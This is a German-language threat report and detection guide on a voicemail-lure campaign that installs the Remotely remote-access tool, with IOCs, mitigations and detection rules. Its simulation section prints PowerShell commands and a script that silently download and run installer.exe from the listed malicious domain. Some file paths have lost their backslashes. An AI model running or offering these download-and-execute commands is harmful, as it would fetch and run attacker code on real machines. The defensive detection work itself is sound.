Voicemail-Falle: Deutschsprachige Voicemail-Lockvögel führen zu Fernzugriff
Detection stack
- AIDR
- Alert
- ETL
- Query
Zusammenfassung
Bedrohungsakteure hosten deutschsprachige „Voicemail“-Landingpages, die Benutzer dazu verleiten, eine BAT-Datei herunterzuladen. Das Skript spielt ein harmloses Audio als Ablenkung ab, während es im Hintergrund das legitime Fernüberwachungswerkzeug Remotely installiert. Sobald der RMM-Agent bereitgestellt ist, erhält der Angreifer durch die vom Angreifer kontrollierte C2-Infrastruktur einen persistenten Fernzugriff.
Untersuchung
Censys identifizierte 86 kompromittierte Web-Eigenschaften auf *.cadillac.ps-Domains, die die schädliche BAT-Datei verbreiten. Das Skript ruft einen auf remotely.billbutterworth.com gehosteten PowerShell-Installer auf, der ein Remotely ZIP-Paket herunterlädt. Das Archiv enthält die Remotely-Agent-Komponenten und einen Dienst, der unter C:Program FilesRemotely installiert wird.
Minderung
Blockieren Sie *.cadillac.ps-Domains und remotely.billbutterworth.com auf der DNS/Proxy-Ebene. Schulen Sie Benutzer, keine unerwarteten BAT-Dateien auszuführen oder PowerShell-Befehle von unbekannten Webseiten zu kopieren/einzufügen. Implementieren Sie Endpunktkontrollen, um die Erstellung von Remotely-Diensten und verdächtige Installationspfade oder nicht signierte Werkzeuge zu erkennen.
Reaktion
Alarmieren Sie bei der Erstellung von Remotely_Service und dem Vorhandensein von Remotely_Agent.exe unter Program Files. Suchen Sie nach voicemail.bat und der zugehörigen PowerShell-Installationsaktivität. Isolieren Sie betroffene Hosts, sammeln Sie forensische Artefakte und rotieren/widerrufen Sie alle vom RMM-Agenten verwendeten Anmeldedaten oder Tokens.
Angriffsablauf
Entdeckungen
Download oder Upload via PowerShell (über die Befehlszeile)
Ansehen
Verdächtiges Ransomware-beeinträchtigendes Dienstenende (über die Befehlszeile)
Ansehen
PowerShell führt Datei in verdächtigem Verzeichnis mit Bypass-Ausführungsrichtlinie aus (über die Befehlszeile)
Ansehen
IOCs (HashSha256) zur Erkennung: Voicemail-Falle: Deutschsprachige Voicemail-Köder führt zu Fernzugriff
Ansehen
IOCs (HashMd5) zur Erkennung: Voicemail-Falle: Deutschsprachige Voicemail-Köder führt zu Fernzugriff
Ansehen
Deutscher Voicemail-Köder führt zur RMM-Installation [Webserver]
Ansehen
Erkennung der Ausführung der Voicemail-BAT-Datei [Windows-Dateiereignis]
Ansehen
Simulationsausführung
Voraussetzung: Der Telemetrie- & Basislinien-Vorflugcheck muss bestanden haben.
Begründung: Dieser Abschnitt beschreibt die genaue Ausführung der gegnerischen Technik (TTP), die dazu entwickelt wurde, die Erkennungsregel auszulösen. Die Befehle und Erzählungen MÜSSEN die identifizierten TTPs direkt widerspiegeln und darauf abzielen, die exakt erwartete Telemetrie zu generieren, die der Erkennungslogik entspricht. Abstrakte oder unrelevante Beispiele führen zu Fehldiagnosen.
-
Angriffserzählung & Befehle:
- Phishing-Auslieferung: Der Angreifer sendet eine E-Mail mit einem deutschsprachigen Voicemail-Köder-Anhang (HTML), die, wenn geöffnet, das Opfer umleitet zu
http://bannerbank.cadillac.ps/voicemail.html. - Ausführung der Zielseite: Die Zielseite hostet einen schädlichen PowerShell-Einzeiler, der ein Remote-Management-Werkzeug (RMM) installiert und ausführt.
- Prozesserstellung: Wenn der Browser des Opfers die Seite verarbeitet, wird PowerShell mit einer Befehlszeile aufgerufen, die explizit die beiden Zeichenketten enthält, nach denen die Regel sucht.
- Ergebnisende Telemetrie: Windows protokolliert Ereignis-ID 4688 mit einer
Befehlszeiledie sowohl „voicemail-bezogene Landingpage“ and „bannerbank.cadillac.ps“enthält, wodurch die Sigma-Bedingung erfüllt wird.
Der exakte Befehl, der für die Simulation verwendet wurde:
# Simulierte bösartige Ausführung – enthält beide Auslösezeichenfolgen Start-Process -FilePath "powershell.exe" -ArgumentList "-NoProfile -WindowStyle Hidden -Command `"Write-Host 'voicemail-bezogene Landingpage'; Invoke-WebRequest -Uri 'http://bannerbank.cadillac.ps/installer.exe' -OutFile $env:TEMPinstaller.exe; Start-Process $env:TEMPinstaller.exe`"" - Phishing-Auslieferung: Der Angreifer sendet eine E-Mail mit einem deutschsprachigen Voicemail-Köder-Anhang (HTML), die, wenn geöffnet, das Opfer umleitet zu
-
Regressionstest-Skript: Ein eigenständiges PowerShell-Skript, das den Angriff reproduziert und auf jedem Windows-Rechner mit aktivierter Protokollierung ausgeführt werden kann.
<# .SYNOPSIS Simuliert den deutschen Voicemail-Köder, der die Sigma-Erkennungsregel auslöst. .DESCRIPTION Führt eine PowerShell-Befehlszeile aus, die beide erforderlichen Teilstrings enthält. #> # Definiere schadhafte Zeichenfolgen $lureText = "voicemail-bezogene Landingpage" $maliciousDomain = "bannerbank.cadillac.ps" # Erstelle den Einzeiler, der in der Befehlszeile erscheinen wird $payload = @" Write-Host '$lureText'; Invoke-WebRequest -Uri 'http://$maliciousDomain/installer.exe' -OutFile $env:TEMPinstaller.exe; Start-Process $env:TEMPinstaller.exe "@ # Starte PowerShell mit der vorbereiteten Befehlszeile $psArgs = "-NoProfile -WindowStyle Hidden -Command `"$payload`"" Write-Host "Starte bösartigen PowerShell-Befehl..." Start-Process -FilePath "powershell.exe" -ArgumentList $psArgs -PassThru # Optional: warte ein paar Sekunden, um die Protokollierung sicherzustellen Start-Sleep -Seconds 5 -
Aufräumbefehle: Entfernen Sie den heruntergeladenen Installer und alle Restprozesse.
# Stoppe alle verbliebenen Installer-Prozesse Get-Process -Name "installer" -ErrorAction SilentlyContinue | Stop-Process -Force # Lösche die temporäre Installer-Datei $installerPath = "$env:TEMPinstaller.exe" if (Test-Path $installerPath) { Remove-Item $installerPath -Force Write-Host "Bereinigt $installerPath" }